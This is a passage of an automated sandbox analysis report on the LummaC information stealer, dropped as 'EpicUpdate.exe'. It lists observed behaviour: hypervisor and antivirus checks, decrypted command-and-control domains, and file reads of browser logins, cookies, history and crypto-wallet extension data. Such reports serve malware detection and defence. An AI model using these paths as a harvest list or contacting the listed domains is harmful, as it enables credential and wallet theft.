Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Virtual Processor{
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor>
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Qemu Audio Device
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31830537283.000001ECC0E7F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31830093071.000001ECC0E7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 56Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5068Address Space Switches/sec5070Addr
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisorr
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31836514521.000001ECC28A4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Proce
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2Hyper-V VM Vid Partition.dll(
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware can crash with older drivers and WebGL content

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: EpicUpdate.exe, 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: drawwyobstacw.sbs
Source: EpicUpdate.exe, 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: condifendteu.sbs
Source: EpicUpdate.exe, 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ehticsprocw.sbs
Source: EpicUpdate.exe, 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: vennurviot.sbs
Source: EpicUpdate.exe, 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: resinedyw.sbs
Source: EpicUpdate.exe, 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: enlargkiw.sbs
Source: EpicUpdate.exe, 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: allocatinow.sbs
Source: EpicUpdate.exe, 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: mathcucom.sbs
Source: EpicUpdate.exe, 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: scratgyy.biz

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe

Process created: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe "C:\Users\user\AppData\Local\Temp\EpicUpdate.exe"

Jump to behavior

Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31902009033.000001ECC3005000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31841061318.000001ECC2D0D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31902009033.000001ECC3005000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31841061318.000001ECC2D0D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndMv/-

Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\temp_bRBfgSMcTpYCpANwkGLzu VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
